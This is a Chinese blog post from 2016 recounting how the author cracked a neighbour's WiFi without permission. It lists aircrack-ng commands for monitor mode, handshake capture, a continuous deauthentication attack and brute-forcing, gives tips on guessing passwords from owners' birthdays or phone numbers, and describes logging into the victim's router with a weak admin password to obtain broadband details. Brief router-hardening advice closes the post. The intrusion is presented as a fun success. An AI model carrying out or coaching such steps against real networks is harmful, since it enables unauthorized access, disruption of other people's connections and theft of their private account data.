黑客生活
首发于黑客生活
隔壁黑客上线了-记一次WIFI破解实战

隔壁黑客上线了-记一次WIFI破解实战

放假回家宽带到期,打电话问了一下一年要1000大洋!丫的1000大洋啊,当时我就去他丫的拒绝了,回到家躺了几天实在无聊,无奈掏出了尘封了好多天的笔记本,想写写代码也比躺着消磨时间好。

打开电脑后顺手打开了网络设置

村里穷能搜到WIFI真是不容易,看到这多少有点兴奋,起码有点希望了,然后祭出神器kali。

下面为破解WIFI的正常步骤,由于本次实战没有具体的截图这里部分引用了先前发在博客的WPA-PSK无线网络的破解 内的部分图片,此篇文章也引自那篇笔记。

1.首先开启网卡的监听模式

airmon-ng start wlan0

在开启监听模式后网卡会被重新命名为wlan0mon (kali2.0之前的版本会重命名为 mon)

2.扫描附近无线情况。

airodump-ng wlan0mon

在这里看到了仅有的两个无线网络,而且幸运的是正好有设备在线那就好办了,我们想办法让他掉线,然后在他重新连接时抓取握手包,跑包就可以了。

3.抓取握手包

airodump-ng --bssid 78:A3:51:12:A6:A8  -c 1 -w wifi wlan0mon
参数说明: --bssid 目标AP MAC
-c 目标AP所在信道
-w 握手包保存的文件名

4. 使用DEAUTH攻击使已经连接的客户端断开并重新连接,以产生握手包

aireplay-ng -0 0 -a 78:A3:51:12:A6:A8 -c 84:73:03:A2:82:67 wlan0mon

参数解释: -0 Deautenticate攻击模式 0代表无限次


-a 目标ap的mac
-c 攻击者网卡mac
发起攻击后我们可以看到客户端的帧(Frames)迅速增加

当看到 WPA handshake 时 证明已经成功抓取到握手包

5.跑包

aircrack-ng -w /root/Desktop/pwd.txt wif.cap 

这里由于不知道是哪家的WIFI 没法通过社工创建字典 只能暴力 这里我使用的是八位纯数字字典条数超过1亿,不建议通过这种方法盲目跑包,成功率低、耗时大,建议可以在前期通过简单的信息搜集,根据朋友的经验密码格式大部分为生日:19xx0xxx、名字首字母+生日:zs19xx0xxx 或者为手机号,所以前期收集一些信息会大大减少破解周期。

这次在没有任何信息的情况下我只能通过暴力破解的方法 不过运气不错 密码并不复杂 看了会电视密码就出来了

根据这个密码 可以猜测到路由器管理密码也不会太复杂


果然 123456789成功登录路由器后台,同时也拿到了宽带的相关信息。

如果后台的确使用了较为复杂的密码,可以zhuanlan.zhihu.com/p/20根据这篇文章也可以拿到路由器管理权限。


WIFI已经成为现代人生活中不可缺少的部分,但是目前的情况来看,无线安全仍然存在较大的问题,近期由于无线所引发的问题也越来越多,对于不信任的WIFI千万不要随便连接,如果你一旦进入攻击者的局域网内,你的所有隐私将不会再是隐私。

无线网络引发内网渗透:zhuanlan.zhihu.com/p/21,这篇文章的入口就是WIFI,导致整个内网暴露在攻击者的手下。

对于个人路由器的建议:

1.加强无线密码强度,纯8位数字组合超过1亿 纯9位数字组合超过10亿 如果加入大小写字母 特殊字符 这个组合将成数倍增加,所以一个高强度的密码是路由器防护的第一道墙。

2.开启MAC白名单制,路由器的白名单可以直接丢弃非白名单内的连接。

3.定期查看连接列表,对于不信任的MAC加入黑名单。

以上几点仅能在一定程度上将强安全,但是没有绝对的安全,在复杂的密码只要有时间也会跑出来,白名单黑名单可以通过伪造MAC地址绕过,所以网络安全必须时时警惕。



蹭网、冒雨 30分钟写的,因为不知道什么时候邻居就会拔网线,有错见谅!

编辑于 2016-07-15

文章被以下专栏收录

    文章以渗透笔记、旅行中的入侵趣事为主。信息安全为主、二进制研究为辅,心血来潮时写一点,纯属自娱自乐。交流请文明理性客观,转载请事先征得同意。